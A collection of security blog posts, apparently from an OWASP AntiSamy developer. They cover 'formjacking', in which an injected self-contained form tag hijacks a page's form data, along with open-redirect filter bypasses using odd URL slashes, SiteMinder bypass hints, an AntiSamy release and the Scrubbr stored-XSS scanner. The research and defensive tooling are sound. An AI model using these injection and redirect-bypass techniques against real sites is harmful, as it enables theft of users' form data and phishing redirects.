P.S. Anyone interested in finding more vulnerabilities in SiteMinder should try to use these techniques in different areas. For instance, sending in a canonically decomposable version of an entire URL may prevent any SiteMinder rules from matching, and in those cases where the default resource setting is “UNPROTECTED”, this may amount to a complete authentication and/or authorization bypass. The null byte may also be used in other avenues, but you won’t be hearing about any more flaws I find. =)

A colleague of mine, Jerry Hoff, was testing AntiSamy a while ago and he found an interesting technique he quite hilariously and tongue-in-cheekly called “formjacking.” Once we dissected the payload we found a very strange cross-browser behavior. I wanted to talk about it but never had a chance until now.

It seems that FF3 and IE7 respond uniformly and strangely to self-contained XHTML in many cases. We had encountered this behavior before in responding to functional “bugs” in AntiSamy (though I am, not surprisingly, more inclined to blame them on the browser). When the browser sees the following text, the words “anna faris deserves better” are shown in italics:

<i /> anna faris deserves better

Everything that came after the self-contained italic tag was italicized. The same behavior was found for the bold and underline tags. In AntiSamy we special-cased those and other basic formatting tags to be removed if they were self-contained, and we thought we were done.

Fast forward to Jerry’s payload. Jerry was passing in the following string:

<form action="">

Jerry wanted to pass in an extraneous opening form tag that would pre-empt the other <form> tag in order to steal the profile data when the user hit the submit button. He was counting on something like this appearing after the application reflected his input:

<!-- begin evil user-supplied data -->
<form action="">
<!-- end evil user-supplied data -->
<form action="/good/updateProfile">
<textarea name='profile'></textarea>

He was hoping that the browser would ignore the original <form> tag, which had been nested by his attack string. This would work across browsers, as you can demonstrate for yourself on this test page. This type of attack never worried me with AntiSamy because I knew that AntiSamy balances input. Because Jerry didn’t have properly formed XHTML in his input (he only had an opening tag and no closing tag), AntiSamy cleaned it up for him, and his resulting profile was this value:

<form action=""/>

Notice that it is self-contained. Little did I know that I should be worried about this. Much as the self-contained tags <b/> and <i/> embolden or italicize the rest of the page, this self-contained <form/> tag somehow forced the browser to ignore the following <form> tag, and thus stole all the inputs on the rest of the page. So when the user hits the submit button, all the information is sent to the attacker!

I don’t think I’m alone in thinking this is very strange behavior. Because of the nature of XML, you would think that a self-contained <form/> tag should have absolutely zero impact on anything else on the page, including any other forms. This is not the case, obviously. You can find some simple test pages for mixing self-contained with non-self-contained <form> tags here, but the net result is this – if the attacker can provide a <form> tag before your <form> tag, they can steal the form data.

There’s probably more stuff you can do with this browser behavior. <script/>, anyone?

Last week I needed to beat a commercial product that was preventing an unchecked redirect vulnerability from being exploited. The input was being reflected into the location header, and anything that “looked like” a URL was getting blocked. After some laborious man-fuzzing (basically re-verifying the research I found existed after the fact in the under-utilized Browser Security Handbook) I discovered that the following is a valid URL when referenced by tags and in location headers in IE:


What about Firefox? Aside from the well-known vector that doesn’t require an http at all (a URL beginning with //), FF3 also appears to accept three leading forward slashes in a URL found in a tag/redirect:


There are lots of RFCs and official-looking documents that seem to contradict one another about what a legal URI looks like, so I’m quite inclined not to care who is right or wrong. For the record, lots of other random things worked when I was testing in the address bar and in a local file, so let me save you some time and tell you that’s a bad place to test. Most of the things you find work there won’t work anywhere else.
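For the protocol-relative case at least, this isn’t even browser weirdness: standard RFC 3986 resolution turns a “network-path reference” into a fully qualified URL on the new host, as the JDK itself will tell you (hosts below are made up for illustration):

```java
import java.net.URI;

// RFC 3986 resolution: a reference beginning with "//" keeps the base
// scheme but swaps in the attacker-controlled authority.
public class SchemeRelative {
    public static void main(String[] args) {
        URI base = URI.create("http://example.com/redirect");
        URI resolved = base.resolve("//evil.example/phish");
        System.out.println(resolved); // http://evil.example/phish
    }
}
```

So any redirect filter that only looks for a leading "http" is already beaten by the spec, before you even get to the sloppier triple-slash parsing.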

So, in order to make their page really reflect all the necessary information, I think the Google Security team should split out the scheme/slash row in the URL table to indicate whether or not a URL scheme/slash combination “works” when encountered in a 302 location header, src attribute, as a link, or in the address bar. Hopefully that will be a well-maintained document, but I know it is probably a huge pain in the ass to keep such a cutting-edge resource continually up to date.

Happy Nowruz!

Go download!

The changes:

  • Fixed empty element “bug” (a <b/> causes the rest of the page to be bold cross-browser, wtf? more on this later)
  • Fixed some bugs handling CSS colors, fonts and margins (negative margins not allowed and colors are now c14nized – thx to Jason Li and designbistro)
  • Added a usable pom.xml (thx to fernman)
  • Fixed a bunch of CSS policy file functional problems (thx to Jerry Hoff who is also working hard getting the .NET version to 1.0)
  • Added demo WAR to the downloads
  • Numerous other little bug fixes

The test cases all pass except one. The only one that fails is actually a problem with NekoHTML, the HTML parsing engine on top of which AntiSamy sits. As you can see here, I provided them a working patch, test case, and justification. I’ve been watching their source tree closely and I don’t see any movement on this particular issue. However, as a group we decided to just live with it until they fix it, rather than maintain a forked version of their library. I trust that they’ll eventually fix it, and you can still use my patch to fix your own copy if that’s unacceptable.

Here’s what’s on the roadmap for 1.4:

  • full Maven support
  • SAX parser (should increase speed by ~50%)
  • programmatic access to the Policy object with guaranteed thread safety

As always, if you have issues, questions, or feedback drop us a line on the Google Code issue tracker or OWASP AntiSamy mailing list.

Thanks to all the people who submitted issues, patches and feedback. You guys are awesome.

Some backstory: When the Asprox mass SQL injection attack hit the web, HP teamed up with Microsoft and did a very cool thing. They donated a free, trimmed down version of their dynamic analysis tool called Scrawlr to the world. Scrawlr poked around your site, and if it detected SQL injection vulnerabilities, it let you know. Simple, useful, awesome.

When it came to fixing databases, people were at a loss in the beginning. Thanks to the blogotubes, database queries written by smart guys to detect and reverse the particular payload installed by the attack were spread pretty quickly.

Back to present day: Trying to find stored XSS in your database manually is insane. It just is. Even if you fix a stored XSS vulnerability with input validation and you’re convinced that it’s reliable, you could still have existing malicious data in your database that can still be used to harm your users. The fact is your database is probably just a huge abyss of data, and it’s not getting any brighter.

That’s why Aspect Security generously gave me work time to write a tool to automate that process. Even more generously, they donated the end result to OWASP (as they are wont to do). What resulted is a standalone GUI tool called Scrubbr, in hopefully obvious honor of and not theft from the Scrawlr folks.

Scrubbr allows you to get some visibility into your MySQL, MS SQL Server, or Oracle database when looking for XSS. It finds XSS vulnerabilities using AntiSamy as an engine. It can also actually fix any malicious data you encounter, also using AntiSamy. Fixing seems to work very well in MySQL and SQL Server but hasn’t been tested much in Oracle.

Here is a snippet from the OWASP page that talks about the use of AntiSamy in this context, as well as the “Fix” button:

Frankly, you’d have to be crazy to change production data with a tool you didn’t write yourself (and maybe even then). Trying to write a cross-platform database tool that can read and write is also a little crazy. The database technologies differ in so many stupid ways, and we mostly rely on JDBC to handle the interaction with the database. The “Fix” button is provided as-is, but of course we would like to hear about and fix your particular problem, and you can let us know about it at the issue tracker.

If you can tell Scrubbr how to access your database, it will search through every field capable of holding strings in the database for malicious code. If you want it to, it will search through every table, every row, and every column.

Scrubbr can detect input that doesn’t match up with an AntiSamy policy file. There is a subtle difference between “matching an AntiSamy policy” and being “detected as an attack.”

There are numerous tools out there that *detect* XSS attacks in different contexts better than AntiSamy. The most prominent and peer-reviewed are NoScript and PHPIDS. However, detection is not strictly what AntiSamy does. AntiSamy checks whether rich input that is passed in is allowed according to a policy file. Chances are that there is some input in your database that looks like rich input as we in the web world think about it, but actually isn’t.

With all of that being said, AntiSamy does an excellent job in most situations and will still detect the vast majority of stored XSS attacks, depending on the injection context.

So, hopefully in the future we can hook it up to a more appropriate engine like the PHPIDS ruleset. We will also strive to make it produce fewer false positives. However, regardless of the false positives, I think we are a lot better off today than we were yesterday, so go download Scrubbr now!